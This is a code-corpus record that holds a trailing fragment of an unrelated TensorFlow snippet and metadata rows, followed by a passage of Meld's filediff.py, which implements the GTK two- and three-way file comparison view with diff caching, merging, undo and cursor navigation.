y = subpixel_reshuffle_1D(conv,
num_of_channels)
y = tf.add(y, x, name=scope_name)
print('output: {}'.format(y.get_shape().as_list()[1:]))
return train_flag, x, y
# #################
# #################
| mit | 1,638,412,468,420,272,000 | 39.112205 | 79 | 0.49178 | false | 4.135782 | false | false | false |
nekohayo/meld | meld/filediff.py | 1 | 77547 | ### Copyright (C) 2002-2006 Stephen Kennedy <[email protected]>
### Copyright (C) 2009-2010 Kai Willadsen <[email protected]>
### This program is free software; you can redistribute it and/or modify
### it under the terms of the GNU General Public License as published by
### the Free Software Foundation; either version 2 of the License, or
### (at your option) any later version.
### This program is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
### You should have received a copy of the GNU General Public License
### along with this program; if not, write to the Free Software
### Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import codecs
import copy
import os
from gettext import gettext as _
import sys
import time
import pango
import glib
import gobject
import gtk
import gtk.keysyms
import diffutil
from ui import findbar
from ui import gnomeglade
import matchers
import misc
import melddoc
import patchdialog
import paths
import merge
from meldapp import app
from util.sourceviewer import srcviewer
class CachedSequenceMatcher(object):
"""Simple class for caching diff results, with LRU-based eviction
Results from the SequenceMatcher are cached and timestamped, and
subsequently evicted based on least-recent generation/usage. The LRU-based
eviction is overly simplistic, but is okay for our usage pattern.
"""
def __init__(self):
self.cache = {}
def __call__(self, text1, textn):
try:
self.cache[(text1, textn)][1] = time.time()
return self.cache[(text1, textn)][0]
except KeyError:
matcher = matchers.MyersSequenceMatcher(None, text1, textn)
opcodes = matcher.get_opcodes()
self.cache[(text1, textn)] = [opcodes, time.time()]
return opcodes
def clean(self, size_hint):
"""Clean the cache if necessary
@param size_hint: the recommended minimum number of cache entries
"""
if len(self.cache) < size_hint * 3:
return
items = self.cache.items()
items.sort(key=lambda it: it[1][1])
for item in items[:-size_hint * 2]:
del self.cache[item[0]]
class BufferLines(object):
"""gtk.TextBuffer shim with line-based access and optional filtering
This class allows a gtk.TextBuffer to be treated as a list of lines of
possibly-filtered text. If no filter is given, the raw output from the
gtk.TextBuffer is used.
The logic here (and in places in FileDiff) requires that Python's
unicode splitlines() implementation and gtk.TextBuffer agree on where
linebreaks occur. Happily, this is usually the case.
"""
def __init__(self, buf, textfilter=None):
self.buf = buf
if textfilter is not None:
self.textfilter = textfilter
else:
self.textfilter = lambda x: x
def __getslice__(self, lo, hi):
# FIXME: If we ask for arbitrary slices past the end of the buffer,
# this will return the last line.
start = get_iter_at_line_or_eof(self.buf, lo)
end = get_iter_at_line_or_eof(self.buf, hi)
txt = unicode(self.buf.get_text(start, end, False), 'utf8')
filter_txt = self.textfilter(txt)
lines = filter_txt.splitlines()
ends = filter_txt.splitlines(True)
# The last line in a gtk.TextBuffer is guaranteed never to end in a
# newline. As splitlines() discards an empty line at the end, we need
# to artificially add a line if the requested slice is past the end of
# the buffer, and the last line in the slice ended in a newline.
if hi >= self.buf.get_line_count() and \
(len(lines) == 0 or len(lines[-1]) != len(ends[-1])):
lines.append(u"")
ends.append(u"")
hi = self.buf.get_line_count() if hi == sys.maxint else hi
if hi - lo != len(lines):
# These codepoints are considered line breaks by Python, but not
# by GtkTextStore.
additional_breaks = set((u'\x0c', u'\x85'))
i = 0
while i < len(ends):
line, end = lines[i], ends[i]
# It's possible that the last line in a file would end in a
# line break character, which requires no joining.
if end and end[-1] in additional_breaks and \
(not line or line[-1] not in additional_breaks):
assert len(ends) >= i + 1
lines[i:i + 2] = [line + end[-1] + lines[i + 1]]
ends[i:i + 2] = [end + ends[i + 1]]
i += 1
return lines
def __getitem__(self, i):
if i > len(self):
raise IndexError
line_start = get_iter_at_line_or_eof(self.buf, i)
line_end = line_start.copy()
if not line_end.ends_line():
line_end.forward_to_line_end()
txt = self.buf.get_text(line_start, line_end, False)
return unicode(self.textfilter(txt), 'utf8')
def __len__(self):
return self.buf.get_line_count()
################################################################################
#
# FileDiff
#
################################################################################
MASK_SHIFT, MASK_CTRL = 1, 2
MODE_REPLACE, MODE_DELETE, MODE_INSERT = 0, 1, 2
def get_iter_at_line_or_eof(buf, line):
if line >= buf.get_line_count():
return buf.get_end_iter()
return buf.get_iter_at_line(line)
def buffer_insert(buf, line, text):
if line >= buf.get_line_count():
# TODO: We need to insert a linebreak here, but there is no
# way to be certain what kind of linebreak to use.
text = "\n" + text
it = get_iter_at_line_or_eof(buf, line)
buf.insert(it, text)
return it
class CursorDetails(object):
__slots__ = ("pane", "pos", "line", "offset", "chunk", "prev", "next",
"prev_conflict", "next_conflict")
def __init__(self):
for var in self.__slots__:
setattr(self, var, None)
class TaskEntry(object):
__slots__ = ("filename", "file", "buf", "codec", "pane", "was_cr")
def __init__(self, *args):
for var, val in zip(self.__slots__, args):
setattr(self, var, val)
class TextviewLineAnimation(object):
__slots__ = ("start_mark", "end_mark", "start_rgba", "end_rgba",
"start_time", "duration")
def __init__(self, mark0, mark1, rgba0, rgba1, duration):
self.start_mark = mark0
self.end_mark = mark1
self.start_rgba = rgba0
self.end_rgba = rgba1
self.start_time = glib.get_current_time()
self.duration = duration
class FileDiff(melddoc.MeldDoc, gnomeglade.Component):
"""Two or three way diff of text files.
"""
differ = diffutil.Differ
keylookup = {gtk.keysyms.Shift_L : MASK_SHIFT,
gtk.keysyms.Control_L : MASK_CTRL,
gtk.keysyms.Shift_R : MASK_SHIFT,
gtk.keysyms.Control_R : MASK_CTRL}
# Identifiers for MsgArea messages
(MSG_SAME,) = range(1)
__gsignals__ = {
'next-conflict-changed': (gobject.SIGNAL_RUN_FIRST, gobject.TYPE_NONE, (bool, bool)),
'action-mode-changed': (gobject.SIGNAL_RUN_FIRST, gobject.TYPE_NONE, (int,)),
}
def __init__(self, prefs, num_panes):
"""Start up an filediff with num_panes empty contents.
"""
melddoc.MeldDoc.__init__(self, prefs)
gnomeglade.Component.__init__(self, paths.ui_dir("filediff.ui"), "filediff")
self.map_widgets_into_lists(["textview", "fileentry", "diffmap", "scrolledwindow", "linkmap", "statusimage", "msgarea_mgr", "vbox"])
self.warned_bad_comparison = False
# Some sourceviews bind their own undo mechanism, which we replace
gtk.binding_entry_remove(srcviewer.GtkTextView, gtk.keysyms.z,
gtk.gdk.CONTROL_MASK)
gtk.binding_entry_remove(srcviewer.GtkTextView, gtk.keysyms.z,
gtk.gdk.CONTROL_MASK | gtk.gdk.SHIFT_MASK)
for v in self.textview:
v.set_buffer(srcviewer.GtkTextBuffer())
v.set_show_line_numbers(self.prefs.show_line_numbers)
v.set_insert_spaces_instead_of_tabs(self.prefs.spaces_instead_of_tabs)
v.set_wrap_mode(self.prefs.edit_wrap_lines)
if self.prefs.show_whitespace:
v.set_draw_spaces(srcviewer.spaces_flag)
srcviewer.set_tab_width(v, self.prefs.tab_size)
self._keymask = 0
self.load_font()
self.deleted_lines_pending = -1
self.textview_overwrite = 0
self.textview_focussed = None
self.textview_overwrite_handlers = [ t.connect("toggle-overwrite", self.on_textview_toggle_overwrite) for t in self.textview ]
self.textbuffer = [v.get_buffer() for v in self.textview]
self.bufferdata = [MeldBufferData() for b in self.textbuffer]
self.buffer_texts = [BufferLines(b) for b in self.textbuffer]
self.text_filters = []
self.create_text_filters()
app.connect("text-filters-changed", self.on_text_filters_changed)
self.buffer_filtered = [BufferLines(b, self._filter_text) for
b in self.textbuffer]
for (i, w) in enumerate(self.scrolledwindow):
w.get_vadjustment().connect("value-changed", self._sync_vscroll, i)
w.get_hadjustment().connect("value-changed", self._sync_hscroll)
self._connect_buffer_handlers()
self._sync_vscroll_lock = False
self._sync_hscroll_lock = False
self._scroll_lock = False
self.linediffer = self.differ()
self.linediffer.ignore_blanks = self.prefs.ignore_blank_lines
self.in_nested_textview_gutter_expose = False
self._inline_cache = set()
self._cached_match = CachedSequenceMatcher()
self.anim_source_id = []
self.animating_chunks = []
for buf in self.textbuffer:
buf.create_tag("inline", background=self.prefs.color_inline_bg,
foreground=self.prefs.color_inline_fg)
self.anim_source_id.append(None)
self.animating_chunks.append([])
def parse_to_cairo(color_spec):
c = gtk.gdk.color_parse(color_spec)
return tuple([x / 65535. for x in (c.red, c.green, c.blue)])
self.fill_colors = {"insert" : parse_to_cairo(self.prefs.color_delete_bg),
"delete" : parse_to_cairo(self.prefs.color_delete_bg),
"conflict" : parse_to_cairo(self.prefs.color_conflict_bg),
"replace" : parse_to_cairo(self.prefs.color_replace_bg)}
darken = lambda color: tuple([x * 0.8 for x in color])
self.line_colors = {"insert" : darken(self.fill_colors["insert"]),
"delete" : darken(self.fill_colors["delete"]),
"conflict" : darken(self.fill_colors["conflict"]),
"replace" : darken(self.fill_colors["replace"])}
actions = (
("MakePatch", None, _("Format as patch..."), None, _("Create a patch using differences between files"), self.make_patch),
("PrevConflict", None, _("Previous conflict"), "<Ctrl>I", _("Go to the previous conflict"), lambda x: self.on_next_conflict(gtk.gdk.SCROLL_UP)),
("NextConflict", None, _("Next conflict"), "<Ctrl>K", _("Go to the next conflict"), lambda x: self.on_next_conflict(gtk.gdk.SCROLL_DOWN)),
("PushLeft", gtk.STOCK_GO_BACK, _("Push to left"), "<Alt>Left", _("Push current change to the left"), lambda x: self.push_change(-1)),
("PushRight", gtk.STOCK_GO_FORWARD, _("Push to right"), "<Alt>Right", _("Push current change to the right"), lambda x: self.push_change(1)),
# FIXME: using LAST and FIRST is terrible and unreliable icon abuse
("PullLeft", gtk.STOCK_GOTO_LAST, _("Pull from left"), "<Alt><Shift>Right", _("Pull change from the left"), lambda x: self.pull_change(-1)),
("PullRight", gtk.STOCK_GOTO_FIRST, _("Pull from right"), "<Alt><Shift>Left", _("Pull change from the right"), lambda x: self.pull_change(1)),
("CopyLeftUp", None, _("Copy above left"), "<Alt>bracketleft", _("Copy change above the left chunk"), lambda x: self.copy_change(-1, -1)),
("CopyLeftDown", None, _("Copy below left"), "<Alt>semicolon", _("Copy change below the left chunk"), lambda x: self.copy_change(-1, 1)),
("CopyRightUp", None, _("Copy above right"), "<Alt>bracketright", _("Copy change above the right chunk"), lambda x: self.copy_change(1, -1)),
("CopyRightDown", None, _("Copy below right"), "<Alt>quoteright", _("Copy change below the right chunk"), lambda x: self.copy_change(1, 1)),
("Delete", gtk.STOCK_DELETE, _("Delete"), "<Alt>Delete", _("Delete change"), self.delete_change),
("MergeFromLeft", None, _("Merge all changes from left"), None, _("Merge all non-conflicting changes from the left"), lambda x: self.pull_all_non_conflicting_changes(-1)),
("MergeFromRight", None, _("Merge all changes from right"), None, _("Merge all non-conflicting changes from the right"), lambda x: self.pull_all_non_conflicting_changes(1)),
("MergeAll", None, _("Merge all non-conflicting"), None, _("Merge all non-conflicting changes from left and right panes"), lambda x: self.merge_all_non_conflicting_changes()),
("CycleDocuments", None, _("Cycle through documents"), "<control>Escape", _("Move keyboard focus to the next document in this comparison"), self.action_cycle_documents),
)
toggle_actions = (
("LockScrolling", None, _("Lock scrolling"), None,
_("Lock scrolling of all panes"),
self.on_action_lock_scrolling_toggled, True),
)
self.ui_file = paths.ui_dir("filediff-ui.xml")
self.actiongroup = gtk.ActionGroup('FilediffPopupActions')
self.actiongroup.set_translation_domain("meld")
self.actiongroup.add_actions(actions)
self.actiongroup.add_toggle_actions(toggle_actions)
self.set_num_panes(num_panes)
gobject.idle_add( lambda *args: self.load_font()) # hack around Bug 316730
gnomeglade.connect_signal_handlers(self)
self.findbar = findbar.FindBar()
self.filediff.pack_end(self.findbar.widget, False)
self.cursor = CursorDetails()
self.connect("current-diff-changed", self.on_current_diff_changed)
for t in self.textview:
t.connect("focus-in-event", self.on_current_diff_changed)
t.connect("focus-out-event", self.on_current_diff_changed)
self.linediffer.connect("diffs-changed", self.on_diffs_changed)
self.undosequence.connect("checkpointed", self.on_undo_checkpointed)
self.connect("next-conflict-changed", self.on_next_conflict_changed)
def get_keymask(self):
return self._keymask
def set_keymask(self, value):
if value & MASK_SHIFT:
mode = MODE_DELETE
elif value & MASK_CTRL:
mode = MODE_INSERT
else:
mode = MODE_REPLACE
self._keymask = value
self.emit("action-mode-changed", mode)
keymask = property(get_keymask, set_keymask)
def on_focus_change(self):
self.keymask = 0
def on_container_switch_in_event(self, ui):
melddoc.MeldDoc.on_container_switch_in_event(self, ui)
# FIXME: If no focussed textview, action sensitivity will be unset
if self.textview_focussed:
self.scheduler.add_task(self.textview_focussed.grab_focus)
def on_text_filters_changed(self, app):
relevant_change = self.create_text_filters()
if relevant_change:
self.refresh_comparison()
def create_text_filters(self):
# In contrast to file filters, ordering of text filters can matter
old_active = [f.filter_string for f in self.text_filters if f.active]
new_active = [f.filter_string for f in app.text_filters if f.active]
active_filters_changed = old_active != new_active
self.text_filters = [copy.copy(f) for f in app.text_filters]
return active_filters_changed
def _disconnect_buffer_handlers(self):
for textview in self.textview:
textview.set_editable(0)
for buf in self.textbuffer:
assert hasattr(buf,"handlers")
for h in buf.handlers:
buf.disconnect(h)
def _connect_buffer_handlers(self):
for textview in self.textview:
textview.set_editable(1)
for buf in self.textbuffer:
id0 = buf.connect("insert-text", self.on_text_insert_text)
id1 = buf.connect("delete-range", self.on_text_delete_range)
id2 = buf.connect_after("insert-text", self.after_text_insert_text)
id3 = buf.connect_after("delete-range", self.after_text_delete_range)
id4 = buf.connect("notify::cursor-position",
self.on_cursor_position_changed)
buf.handlers = id0, id1, id2, id3, id4
# Abbreviations for insert and overwrite that fit in the status bar
_insert_overwrite_text = (_("INS"), _("OVR"))
# Abbreviation for line, column so that it will fit in the status bar
_line_column_text = _("Ln %i, Col %i")
def on_cursor_position_changed(self, buf, pspec, force=False):
pane = self.textbuffer.index(buf)
pos = buf.props.cursor_position
if pane == self.cursor.pane and pos == self.cursor.pos and not force:
return
self.cursor.pane, self.cursor.pos = pane, pos
cursor_it = buf.get_iter_at_offset(pos)
offset = cursor_it.get_line_offset()
line = cursor_it.get_line()
insert_overwrite = self._insert_overwrite_text[self.textview_overwrite]
line_column = self._line_column_text % (line + 1, offset + 1)
status = "%s : %s" % (insert_overwrite, line_column)
self.emit("status-changed", status)
if line != self.cursor.line or force:
chunk, prev, next = self.linediffer.locate_chunk(pane, line)
if chunk != self.cursor.chunk or force:
self.cursor.chunk = chunk
self.emit("current-diff-changed")
if prev != self.cursor.prev or next != self.cursor.next or force:
self.emit("next-diff-changed", prev is not None,
next is not None)
prev_conflict, next_conflict = None, None
for conflict in self.linediffer.conflicts:
if prev is not None and conflict <= prev:
prev_conflict = conflict
if next is not None and conflict >= next:
next_conflict = conflict
break
if prev_conflict != self.cursor.prev_conflict or \
next_conflict != self.cursor.next_conflict or force:
self.emit("next-conflict-changed", prev_conflict is not None,
next_conflict is not None)
self.cursor.prev, self.cursor.next = prev, next
self.cursor.prev_conflict = prev_conflict
self.cursor.next_conflict = next_conflict
self.cursor.line, self.cursor.offset = line, offset
def on_current_diff_changed(self, widget, *args):
pane = self.cursor.pane
chunk_id = self.cursor.chunk
push_left, push_right, pull_left, pull_right, delete, \
copy_left, copy_right = (True,) * 7
if pane == -1 or chunk_id is None:
push_left, push_right, pull_left, pull_right, delete, \
copy_left, copy_right = (False,) * 7
else:
# Push and Delete are active if the current pane has something to
# act on, and the target pane exists and is editable. Pull is
# sensitive if the source pane has something to get, and the
# current pane is editable. Copy actions are sensitive if the
# conditions for push are met, *and* there is some content in the
# target pane.
editable = self.textview[pane].get_editable()
editable_left = pane > 0 and self.textview[pane - 1].get_editable()
editable_right = pane < self.num_panes - 1 and \
self.textview[pane + 1].get_editable()
if pane == 0 or pane == 2:
chunk = self.linediffer.get_chunk(chunk_id, pane)
insert_chunk = chunk[1] == chunk[2]
delete_chunk = chunk[3] == chunk[4]
push_left = editable_left and not insert_chunk
push_right = editable_right and not insert_chunk
pull_left = pane == 2 and editable and not delete_chunk
pull_right = pane == 0 and editable and not delete_chunk
delete = editable and not insert_chunk
copy_left = push_left and not delete_chunk
copy_right = push_right and not delete_chunk
elif pane == 1:
chunk0 = self.linediffer.get_chunk(chunk_id, 1, 0)
chunk2 = None
if self.num_panes == 3:
chunk2 = self.linediffer.get_chunk(chunk_id, 1, 2)
left_mid_exists = chunk0 is not None and chunk0[1] != chunk0[2]
left_exists = chunk0 is not None and chunk0[3] != chunk0[4]
right_mid_exists = chunk2 is not None and chunk2[1] != chunk2[2]
right_exists = chunk2 is not None and chunk2[3] != chunk2[4]
push_left = editable_left and left_mid_exists
push_right = editable_right and right_mid_exists
pull_left = editable and left_exists
pull_right = editable and right_exists
delete = editable and (left_mid_exists or right_mid_exists)
copy_left = push_left and left_exists
copy_right = push_right and right_exists
self.actiongroup.get_action("PushLeft").set_sensitive(push_left)
self.actiongroup.get_action("PushRight").set_sensitive(push_right)
self.actiongroup.get_action("PullLeft").set_sensitive(pull_left)
self.actiongroup.get_action("PullRight").set_sensitive(pull_right)
self.actiongroup.get_action("Delete").set_sensitive(delete)
self.actiongroup.get_action("CopyLeftUp").set_sensitive(copy_left)
self.actiongroup.get_action("CopyLeftDown").set_sensitive(copy_left)
self.actiongroup.get_action("CopyRightUp").set_sensitive(copy_right)
self.actiongroup.get_action("CopyRightDown").set_sensitive(copy_right)
# FIXME: don't queue_draw() on everything... just on what changed
self.queue_draw()
def on_next_conflict_changed(self, doc, have_prev, have_next):
self.actiongroup.get_action("PrevConflict").set_sensitive(have_prev)
self.actiongroup.get_action("NextConflict").set_sensitive(have_next)
def on_next_conflict(self, direction):
if direction == gtk.gdk.SCROLL_DOWN:
target = self.cursor.next_conflict
else: # direction == gtk.gdk.SCROLL_UP
target = self.cursor.prev_conflict
if target is None:
return
buf = self.textbuffer[self.cursor.pane]
chunk = self.linediffer.get_chunk(target, self.cursor.pane)
buf.place_cursor(buf.get_iter_at_line(chunk[1]))
self.textview[self.cursor.pane].scroll_to_mark(buf.get_insert(), 0.1)
def push_change(self, direction):
src = self._get_focused_pane()
dst = src + direction
chunk = self.linediffer.get_chunk(self.cursor.chunk, src, dst)
assert(src != -1 and self.cursor.chunk is not None)
assert(dst in (0, 1, 2))
assert(chunk is not None)
self.replace_chunk(src, dst, chunk)
def pull_change(self, direction):
dst = self._get_focused_pane()
src = dst + direction
chunk = self.linediffer.get_chunk(self.cursor.chunk, src, dst)
assert(dst != -1 and self.cursor.chunk is not None)
assert(src in (0, 1, 2))
assert(chunk is not None)
self.replace_chunk(src, dst, chunk)
def copy_change(self, direction, copy_direction):
src = self._get_focused_pane()
dst = src + direction
chunk = self.linediffer.get_chunk(self.cursor.chunk, src, dst)
assert(src != -1 and self.cursor.chunk is not None)
assert(dst in (0, 1, 2))
assert(chunk is not None)
copy_up = True if copy_direction < 0 else False
self.copy_chunk(src, dst, chunk, copy_up)
def pull_all_non_conflicting_changes(self, direction):
assert direction in (-1, 1)
dst = self._get_focused_pane()
src = dst + direction
assert src in range(self.num_panes)
merger = merge.Merger()
merger.differ = self.linediffer
merger.texts = self.buffer_texts
for mergedfile in merger.merge_2_files(src, dst):
pass
self._sync_vscroll_lock = True
self.on_textbuffer__begin_user_action()
self.textbuffer[dst].set_text(mergedfile)
self.on_textbuffer__end_user_action()
def resync():
self._sync_vscroll_lock = False
self._sync_vscroll(self.scrolledwindow[src].get_vadjustment(), src)
self.scheduler.add_task(resync)
def merge_all_non_conflicting_changes(self):
dst = 1
merger = merge.Merger()
merger.differ = self.linediffer
merger.texts = self.buffer_texts
for mergedfile in merger.merge_3_files(False):
pass
self._sync_vscroll_lock = True
self.on_textbuffer__begin_user_action()
self.textbuffer[dst].set_text(mergedfile)
self.on_textbuffer__end_user_action()
def resync():
self._sync_vscroll_lock = False
self._sync_vscroll(self.scrolledwindow[0].get_vadjustment(), 0)
self.scheduler.add_task(resync)
def delete_change(self, widget):
pane = self._get_focused_pane()
chunk = self.linediffer.get_chunk(self.cursor.chunk, pane)
assert(pane != -1 and self.cursor.chunk is not None)
assert(chunk is not None)
self.delete_chunk(pane, chunk)
def _synth_chunk(self, pane0, pane1, line):
"""Returns the Same chunk that would exist at
the given location if we didn't remove Same chunks"""
# This method is a hack around our existing diffutil data structures;
# getting rid of the Same chunk removal is difficult, as several places
# have baked in the assumption of only being given changed blocks.
buf0, buf1 = self.textbuffer[pane0], self.textbuffer[pane1]
start0, end0 = 0, buf0.get_line_count() - 1
start1, end1 = 0, buf1.get_line_count() - 1
# This hack is required when pane0's prev/next chunk doesn't exist
# (i.e., is Same) between pane0 and pane1.
prev_chunk0, prev_chunk1, next_chunk0, next_chunk1 = (None,) * 4
_, prev, next = self.linediffer.locate_chunk(pane0, line)
if prev is not None:
while prev >= 0:
prev_chunk0 = self.linediffer.get_chunk(prev, pane0, pane1)
prev_chunk1 = self.linediffer.get_chunk(prev, pane1, pane0)
if None not in (prev_chunk0, prev_chunk1):
start0 = prev_chunk0[2]
start1 = prev_chunk1[2]
break
prev -= 1
if next is not None:
while next < self.linediffer.diff_count():
next_chunk0 = self.linediffer.get_chunk(next, pane0, pane1)
next_chunk1 = self.linediffer.get_chunk(next, pane1, pane0)
if None not in (next_chunk0, next_chunk1):
end0 = next_chunk0[1]
end1 = next_chunk1[1]
break
next += 1
return "Same", start0, end0, start1, end1
def _corresponding_chunk_line(self, chunk, line, pane, new_pane):
"""Approximates the corresponding line between panes"""
old_buf, new_buf = self.textbuffer[pane], self.textbuffer[new_pane]
# Special-case cross-pane jumps
if (pane == 0 and new_pane == 2) or (pane == 2 and new_pane == 0):
proxy = self._corresponding_chunk_line(chunk, line, pane, 1)
return self._corresponding_chunk_line(chunk, proxy, 1, new_pane)
# Either we are currently in a identifiable chunk, or we are in a Same
# chunk; if we establish the start/end of that chunk in both panes, we
# can figure out what our new offset should be.
cur_chunk = None
if chunk is not None:
cur_chunk = self.linediffer.get_chunk(chunk, pane, new_pane)
if cur_chunk is None:
cur_chunk = self._synth_chunk(pane, new_pane, line)
cur_start, cur_end, new_start, new_end = cur_chunk[1:5]
# If the new buffer's current cursor is already in the correct chunk,
# assume that we have in-progress editing, and don't move it.
cursor_it = new_buf.get_iter_at_mark(new_buf.get_insert())
cursor_line = cursor_it.get_line()
cursor_chunk, _, _ = self.linediffer.locate_chunk(new_pane, cursor_line)
if cursor_chunk is not None:
already_in_chunk = cursor_chunk == chunk
else:
cursor_chunk = self._synth_chunk(pane, new_pane, cursor_line)
already_in_chunk = cursor_chunk[3] == new_start and \
cursor_chunk[4] == new_end
if already_in_chunk:
new_line = cursor_line
else:
# Guess where to put the cursor: in the same chunk, at about the
# same place within the chunk, calculated proportionally by line.
# Insert chunks and one-line chunks are placed at the top.
if cur_end == cur_start:
chunk_offset = 0.0
else:
chunk_offset = (line - cur_start) / float(cur_end - cur_start)
new_line = new_start + int(chunk_offset * (new_end - new_start))
return new_line
def action_cycle_documents(self, widget):
pane = self._get_focused_pane()
new_pane = (pane + 1) % self.num_panes
chunk, line = self.cursor.chunk, self.cursor.line
new_line = self._corresponding_chunk_line(chunk, line, pane, new_pane)
new_buf = self.textbuffer[new_pane]
self.textview[new_pane].grab_focus()
new_buf.place_cursor(new_buf.get_iter_at_line(new_line))
self.textview[new_pane].scroll_to_mark(new_buf.get_insert(), 0.1)
def on_textview_focus_in_event(self, view, event):
self.textview_focussed = view
self.findbar.textview = view
self.on_cursor_position_changed(view.get_buffer(), None, True)
self._set_merge_action_sensitivity()
def _after_text_modified(self, buffer, startline, sizechange):
if self.num_panes > 1:
pane = self.textbuffer.index(buffer)
self.linediffer.change_sequence(pane, startline, sizechange,
self.buffer_filtered)
# FIXME: diff-changed signal for the current buffer would be cleaner
focused_pane = self._get_focused_pane()
if focused_pane != -1:
self.on_cursor_position_changed(self.textbuffer[focused_pane],
None, True)
self.update_highlighting()
self.queue_draw()
def _filter_text(self, txt):
def killit(m):
assert m.group().count("\n") == 0
if len(m.groups()):
s = m.group()
for g in m.groups():
if g:
s = s.replace(g,"")
return s
else:
return ""
try:
for filt in self.text_filters:
if filt.active:
txt = filt.filter.sub(killit, txt)
except AssertionError:
if not self.warned_bad_comparison:
misc.run_dialog(_("Filter '%s' changed the number of lines in the file. "
"Comparison will be incorrect. See the user manual for more details.") % filt.label)
self.warned_bad_comparison = True
return txt
def after_text_insert_text(self, buf, it, newtext, textlen):
start_mark = buf.get_mark("insertion-start")
starting_at = buf.get_iter_at_mark(start_mark).get_line()
buf.delete_mark(start_mark)
lines_added = it.get_line() - starting_at
self._after_text_modified(buf, starting_at, lines_added)
def after_text_delete_range(self, buffer, it0, it1):
starting_at = it0.get_line()
assert self.deleted_lines_pending != -1
self._after_text_modified(buffer, starting_at, -self.deleted_lines_pending)
self.deleted_lines_pending = -1
def load_font(self):
fontdesc = pango.FontDescription(self.prefs.get_current_font())
context = self.textview0.get_pango_context()
metrics = context.get_metrics( fontdesc, context.get_language() )
self.pixels_per_line = (metrics.get_ascent() + metrics.get_descent()) / 1024
self.pango_char_width = metrics.get_approximate_char_width()
tabs = pango.TabArray(10, 0)
tab_size = self.prefs.tab_size
for i in range(10):
tabs.set_tab(i, pango.TAB_LEFT, i*tab_size*self.pango_char_width)
for i in range(3):
self.textview[i].modify_font(fontdesc)
self.textview[i].set_tabs(tabs)
for i in range(2):
self.linkmap[i].queue_draw()
def on_preference_changed(self, key, value):
if key == "tab_size":
tabs = pango.TabArray(10, 0)
for i in range(10):
tabs.set_tab(i, pango.TAB_LEFT, i*value*self.pango_char_width)
for i in range(3):
self.textview[i].set_tabs(tabs)
for t in self.textview:
srcviewer.set_tab_width(t, value)
elif key == "use_custom_font" or key == "custom_font":
self.load_font()
elif key == "show_line_numbers":
for t in self.textview:
t.set_show_line_numbers( value )
elif key == "show_whitespace":
spaces_flag = srcviewer.spaces_flag if value else 0
for v in self.textview:
v.set_draw_spaces(spaces_flag)
elif key == "use_syntax_highlighting":
for i in range(self.num_panes):
srcviewer.set_highlight_syntax(self.textbuffer[i], value)
elif key == "edit_wrap_lines":
for t in self.textview:
t.set_wrap_mode(self.prefs.edit_wrap_lines)
# FIXME: On changing wrap mode, we get one redraw using cached
# coordinates, followed by a second redraw (e.g., on refocus) with
# correct coordinates. Overly-aggressive textview lazy calculation?
self.diffmap0.queue_draw()
self.diffmap1.queue_draw()
elif key == "spaces_instead_of_tabs":
for t in self.textview:
t.set_insert_spaces_instead_of_tabs(value)
elif key == "ignore_blank_lines":
self.linediffer.ignore_blanks = self.prefs.ignore_blank_lines
self.refresh_comparison()
def on_key_press_event(self, object, event):
x = self.keylookup.get(event.keyval, 0)
if self.keymask | x != self.keymask:
self.keymask |= x
elif event.keyval == gtk.keysyms.Escape:
self.findbar.hide()
def on_key_release_event(self, object, event):
x = self.keylookup.get(event.keyval, 0)
if self.keymask & ~x != self.keymask:
self.keymask &= ~x
# Ugly workaround for bgo#584342
elif event.keyval == gtk.keysyms.ISO_Prev_Group:
self.keymask = 0
def _get_pane_label(self, i):
#TRANSLATORS: this is the name of a new file which has not yet been saved
return self.bufferdata[i].label or _("<unnamed>")
def on_delete_event(self, appquit=0):
response = gtk.RESPONSE_OK
modified = [b.modified for b in self.bufferdata]
if 1 in modified:
dialog = gnomeglade.Component(paths.ui_dir("filediff.ui"), "closedialog")
dialog.widget.set_transient_for(self.widget.get_toplevel())
buttons = []
for i in range(self.num_panes):
b = gtk.CheckButton( self._get_pane_label(i) )
b.set_use_underline(False)
buttons.append(b)
dialog.box.pack_start(b, 1, 1)
if not modified[i]:
b.set_sensitive(0)
else:
b.set_active(1)
dialog.box.show_all()
response = dialog.widget.run()
try_save = [ b.get_active() for b in buttons]
dialog.widget.destroy()
if response==gtk.RESPONSE_OK:
for i in range(self.num_panes):
if try_save[i]:
if not self.save_file(i):
return gtk.RESPONSE_CANCEL
elif response == gtk.RESPONSE_DELETE_EVENT:
response = gtk.RESPONSE_CANCEL
return response
#
# text buffer undo/redo
#
def on_textbuffer__begin_user_action(self, *buffer):
self.undosequence.begin_group()
def on_textbuffer__end_user_action(self, *buffer):
self.undosequence.end_group()
self.update_highlighting()
def on_text_insert_text(self, buf, it, text, textlen):
text = unicode(text, 'utf8')
self.undosequence.add_action(
BufferInsertionAction(buf, it.get_offset(), text))
buf.create_mark("insertion-start", it, True)
def on_text_delete_range(self, buf, it0, it1):
text = unicode(buf.get_text(it0, it1, False), 'utf8')
assert self.deleted_lines_pending == -1
self.deleted_lines_pending = it1.get_line() - it0.get_line()
self.undosequence.add_action(
BufferDeletionAction(buf, it0.get_offset(), text))
def on_undo_checkpointed(self, undosequence, buf, checkpointed):
self.set_buffer_modified(buf, not checkpointed)
#
#
#
def open_external(self):
pane = self._get_focused_pane()
if pane >= 0:
if self.bufferdata[pane].filename:
self._open_files([self.bufferdata[pane].filename])
def get_selected_text(self):
"""Returns selected text of active pane"""
pane = self._get_focused_pane()
if pane != -1:
buf = self.textbuffer[pane]
sel = buf.get_selection_bounds()
if sel:
return unicode(buf.get_text(sel[0], sel[1], False), 'utf8')
return None
def on_find_activate(self, *args):
self.findbar.start_find( self.textview_focussed )
self.keymask = 0
def on_replace_activate(self, *args):
self.findbar.start_replace( self.textview_focussed )
self.keymask = 0
def on_find_next_activate(self, *args):
self.findbar.start_find_next(self.textview_focussed)
def on_find_previous_activate(self, *args):
self.findbar.start_find_previous(self.textview_focussed)
def on_filediff__key_press_event(self, entry, event):
if event.keyval == gtk.keysyms.Escape:
self.findbar.hide()
def on_scrolledwindow__size_allocate(self, scrolledwindow, allocation):
index = self.scrolledwindow.index(scrolledwindow)
if index == 0 or index == 1:
self.linkmap[0].queue_draw()
if index == 1 or index == 2:
self.linkmap[1].queue_draw()
def on_textview_popup_menu(self, textview):
self.popup_menu.popup(None, None, None, 0,
gtk.get_current_event_time())
return True
def on_textview_button_press_event(self, textview, event):
if event.button == 3:
textview.grab_focus()
